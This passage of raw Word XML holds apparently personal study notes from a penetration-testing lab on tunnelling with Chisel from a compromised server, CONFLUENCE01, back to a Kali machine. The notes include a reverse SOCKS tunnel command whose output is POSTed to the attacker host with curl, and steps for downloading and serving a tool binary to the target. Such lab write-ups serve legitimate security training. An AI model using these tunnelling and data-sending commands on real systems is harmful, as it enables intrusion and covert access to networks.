      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/tmp/output</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. We then run </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">curl</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> with the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">--data</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> flag, telling it to read the file at </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/tmp/output</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, and POST it back to our Kali machine on port 8080.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000A4C">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000A4D">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/tmp/chisel client 192.168.118.4:8080 R:socks &amp;&gt; /tmp/output; curl --data @/tmp/output http://192.168.118.4:8080/</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000A4E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="652"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We run this on CONFLUNCE01</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000A4F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="652"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This is the error-collecting-and-sending command string.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000A50">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000A51">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">On sending this new command, we check Tcpdump output for attempted connections.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000A52">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="3556000"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="321" name="image311.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image311.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId216"/>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A53">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000A54">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We get the output that running </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/tmp/chisel</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> produces. Chisel is trying to use versions 2.32 and 2.34 of</w:t>
      </w:r>
      <w:hyperlink r:id="rId217">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve"> </w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink r:id="rId218">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:b w:val="1"/>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">glibc</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, which the CONFLUENCE01 server does not have.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000A55">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000A56">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Note: This module was written in 2023, using Chisel version 1.8.1-0kali2 (go1.20.7). The Kali repos will likely contain later versions of Chisel in the future, and the exact error message that comes back from these later versions of Chisel may be different. However, the same principle applies. We have encountered an error trying to run a payload on a target system. As such, we must find an alternative payload which will run. Finding a way around these kinds of setbacks is an important skill which can be applied to many other situations where tool incompatibilities arise.This module was written in 2023, using Chisel version 1.8.1-0kali2 (go1.20.7). The Kali repos will likely contain later versions of Chisel in the future, and the exact error message that comes back from these later versions of Chisel may be different. However, the same principle applies. We have encountered an error trying to run a payload on a target system. As such, we must find an alternative payload which will run. Finding a way around these kinds of setbacks is an important skill which can be applied to many other situations where tool incompatibilities arise.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000A57">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000A58">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000A59">
      <w:pPr>
        <w:spacing w:after="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This points towards a version incompatibility. When a version of a tool or component is more recent than the operating system it's trying to run on, there's a risk that the operating system will not contain the required technologies that the newer tool is expecting to be able to use. In this case, </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Chisel is expecting to use glibc version 2.32 or 2.34</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, neither of which can be found on CONFLUENCE01.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000A5A">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">To try to find a solution, let's first check the version information for the Chisel binary we have on Kali, which we are also trying to run on CONFLUENCE01.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000A5B">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="2654300"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="230" name="image224.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image224.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId219"/>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A5C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="438"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">chisel -h</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000A5D">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000A5E">
      <w:pPr>
        <w:spacing w:after="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The version of Chisel that ships with this version of Kali is 1.8.1. However, there is another detail that's important here. It has been compiled with Go version 1.20.7.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000A5F">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Some light web surfing reveals:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000A60">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="354"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:before="240" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:hyperlink r:id="rId220">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">similar</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000A61">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="354"/>
        </w:numPr>
        <w:spacing w:after="240" w:before="0" w:beforeAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:hyperlink r:id="rId221">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">messages</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000A62">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Where it appear when binaries compiled with Go versions 1.20 and later are run on operating systems that don't have a compatible version of glibc.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000A63">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">On the Chisel Github page, we find an "official" compiled binary, also version 1.8.1, is compiled with</w:t>
      </w:r>
      <w:hyperlink r:id="rId222">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve"> </w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink r:id="rId223">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Go version 1.19</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. Version 1.19 is one version of Go lower than the version that seems to have introduced this glibc incompatibility. </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">With that in mind, we can try using the Go 1.19-compiled Chisel 1.8.1 binary for Linux on amd64 processors</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. This is available on the main Chisel Github.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000A64">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We can first download the gzipped binary from Github using </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">wget</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. We can unpack that using </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">gunzip</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, then host on python to send it back over to CONFLUENCE01</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000A65">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000A66">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="33"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">wget https://github.com/jpillora/chisel/releases/download/v1.8.1/chisel_1.8.1_linux_amd64.gz</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000A67">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="33"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">gunzip chisel_1.8.1_linux_amd64.gz</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000A68">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="33"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">python3 -m http.server 80</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000A69">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000A6A">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We can then try to run the Chisel client again on CONFLUENCE01 geting chisel on it.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000A6B">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000A6C">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This time, different kind of traffic is logged in our Tcpdump session.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000A6D">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000A6E">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="6832600"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="170" name="image160.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image160.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId224"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="68326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numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="704"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo tcpdump -nvvvXi tun0 tcp port 8080</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000A70">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000A71">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000A72">
      <w:pPr>
        <w:spacing w:after="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The traffic that Tcpdump has logged indicates that the Chisel client has created an HTTP WebSocket connection with the server running on out Kali machine.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000A73">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">On top of this, our Chisel server has logged an inbound connection.</w:t>
      </w:r>
    </w:p>
